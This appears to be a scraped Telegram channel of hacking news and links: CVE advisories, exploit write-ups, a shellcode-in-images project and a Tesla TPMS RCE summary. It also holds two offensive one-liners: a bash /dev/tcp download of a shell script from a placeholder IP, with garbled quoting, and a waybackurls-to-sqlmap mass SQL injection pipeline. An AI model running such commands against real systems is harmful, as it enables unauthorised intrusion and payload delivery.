bash-c "exec 3<>/dev/tcp/IP/80; echo -e GET/ youfile.sh HTTP/1.1\r\nHost; ip\r\nConnection: close\r\n\r\n' >&3; cat <&3-> yourfile.sh'Source: Linkedin | Harvey Spec
Please open Telegram to view this post
VIEW IN TELEGRAM
π5
This media is not supported in your browser
VIEW IN TELEGRAM
Dangerous AI communication.
GibberLink mode.
Source: https://www.linkedin.com/in/georgi-gerganov-b230ab24
π€£4
Please open Telegram to view this post
VIEW IN TELEGRAM
π€©1
https://github.com/WafflesExploits/hide-payload-in-images
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - andrecrafts/hide-payload-in-images: A project that demonstrates embedding shellcode payloads into image files (like PNGs)β¦
A project that demonstrates embedding shellcode payloads into image files (like PNGs) using Python and extracting them using C/C++. Payloads can be retrieved directly from the file on disk or from ...
https://www.hackers-arise.com/post/new-no-click-critical-vulnerability-in-microsoft-windows-cve-2025-21298
Please open Telegram to view this post
VIEW IN TELEGRAM
Hackers Arise - EXPERT CYBERSECURITY TRAINING FOR ETHICAL HACKERS
NEW No-Click Critical Vulnerability in Microsoft Windows: CVE-2025-21298 - Hackers Arise
Welcome back, my aspiring cyberwarriors! Over the years, Microsoft Windows operating system, the world's most widely used OS, has been riddled with security vulnerabilities. As the years have gone by and Microsoft has become more security conscience, theβ¦
π1π1π€‘1
https://techcrunch.com/2025/03/21/russian-zero-day-seller-is-offering-up-to-4-million-for-telegram-exploits/
Please open Telegram to view this post
VIEW IN TELEGRAM
TechCrunch
Russian zero-day seller is offering up to $4 million for Telegram exploits | TechCrunch
Two sources in the zero-day industry say Operation Zero's prices for exploits against the popular messaging app Telegram will depend on different factors.
π2
Please open Telegram to view this post
VIEW IN TELEGRAM
π1π₯1
https://cybersecuritynews.com/ramigpt-gain-root-access/
Please open Telegram to view this post
VIEW IN TELEGRAM
Cyber Security News
RamiGPT β AI Tool To Escalate Privilege & Gain Root Access Within a Minute
A new AI-driven offensive security tool, RamiGPT, is known for its ability to autonomously escalate privileges and gain root access to vulnerable systems in under a minute.
π2
www.mobile-hacker.com/2025/03/31/feberis-pro-the-ultimate-4-in-1-expansion-board-for-flipper
Please open Telegram to view this post
VIEW IN TELEGRAM
Mobile Hacker
Feberis Pro: The Ultimate 4-in-1 Expansion Board for Flipper Zero
In a previous blog post, I introduced Feberis, a versatile expansion board that enhanced the capabilities of the Flipper Zero by offering additional communication protocols. Now, I am excited to dive into the newly released Feberis Pro, a next-generationβ¦
The attacker exploited a vulnerability in Oracle Access Manager to breach Oracle-hosted servers. The vulnerability is tracked as CVE-2021-35587 and was assigned a critical severity score 9.8/10. It was patched in mid-January 2022, raising questions over whether Oracle kept its own servers vulnerable to a flaw it fixed more than three years ago.
CrowdStrike is investigating the incident along FBI.
https://www.techradar.com/pro/security/oracle-quietly-confirms-public-cloud-data-breach-customer-data-stolen
Please open Telegram to view this post
VIEW IN TELEGRAM
TechRadar
Oracle quietly confirms public cloud data breach, customer data stolen
Oracle has sent out breach notifications
π₯3
https://tinted-hollyhock-92d.notion.site/EPICOR-HCM-Unauthenticated-Blind-SQL-Injection-CVE-2025-22953-170f1fdee211803988d1c9255a8cb904
Please open Telegram to view this post
VIEW IN TELEGRAM
tinted-hollyhock-92d on Notion
EPICOR HCM Unauthenticated Blind SQL Injection CVE-2025-22953 | Notion
[Update β Patch Released by Epicor]
β€βπ₯2π¦2
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"Credits: Zlatan H
Please open Telegram to view this post
VIEW IN TELEGRAM
https://timsh.org/tracking-myself-down-through-in-app-ads/
https://timsh.org/everyone-knows-your-location-part-2-try-it-yourself/
analyse-ad-traffic l: A guide + python notebook that helps to collect, analyse and visualise requests sent by a mobile device while using some app.
https://github.com/tim-sha256/analyse-ad-traffic
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯4π€‘1
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Hacking a Microprocessor - Reverse Engineer shows you how it's done
*Become a Patreon* https://www.patreon.com/RECESSIM
*$10 Perplexity Discount* https://perplexity.ai/pro?referral_code=Q8T83K9C
Learn how Reverse Engineers extract secrets from locked microchips. It's not as hard as you might think!
*0x01 Team* https://0x01team.comβ¦
*$10 Perplexity Discount* https://perplexity.ai/pro?referral_code=Q8T83K9C
Learn how Reverse Engineers extract secrets from locked microchips. It's not as hard as you might think!
*0x01 Team* https://0x01team.comβ¦
π₯4π±2
Server MS-TNAP Authentication Bypass [RCE 0day]
A critical 0-click remote authentication bypass vulnerability in Microsoft Telnet Server that allows attackers to gain access as any user, including Administrator, without requiring valid credentials. The vulnerability exploits a misconfiguration in the NTLM Authentication processes of the Telnet MS-TNAP extension allowing remote unauthenticated attackers to bypass authentication completely.
Unconfirmed code
https://github.com/hackerhouse-opensource/hfwintelnet
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯2π1π1
Security researchers Thomas Imbert, Vincent Dehors, and David BΓ©rard found and responsibly disclosed recently a remote code execution (RCE) vulnerability in Tesla's VCSEC ECU.
Technical overview: By manipulating the response sent from the Tire Pressure Monitoring System (TPMS), an attacker can trigger an integer overflow and execute code in the context of the VCSEC module. This gives the attacker the ability to send arbitrary messages to the vehicle's CAN bus.More details: "0-click RCE on Tesla Model 3 through TPMS Sensors" [PDF]:
https://www.synacktiv.com/sites/default/files/2024-10/hexacon_0_click_rce_on_tesla_model_3_through_tpms_sensors_light.pdf
Advisory: https://www.zerodayinitiative.com/advisories/ZDI-25-265/
Under Pressure: Exploring a Zero-Click RCE Vulnerability in Tesla's TPMS:
https://vicone.com/blog/under-pressure-exploring-a-zero-click-rce-vulnerability-in-teslas-tpms
Please open Telegram to view this post
VIEW IN TELEGRAM
π3π1
An out-of-bounds write vulnerability has been reported in macOS. The vulnerability is due to the lack of proper validation of βlutAToBTypeβ and βlutBToATypeβ tag types.
A remote attacker could exploit this vulnerability by enticing a victim to open a crafted file. A successful attack may result in code execution on the victim's machine in the context of the running process.https://www.zerodayinitiative.com/blog/2025/5/7/cve-2024-44236-remote-code-execution-vulnerability-in-apple-macos
Please open Telegram to view this post
VIEW IN TELEGRAM
Zero Day Initiative
Zero Day Initiative β CVE-2024-44236: Remote Code Execution vulnerability in Apple macOS
In this excerpt of a Trend Vulnerability Research Service vulnerability report, Nikolai Skliarenko and Yazhi Wang of the Trendβ’ Research Team detail a recently patched code execution vulnerability in the Apple macOS operating system. This bug was originallyβ¦
π1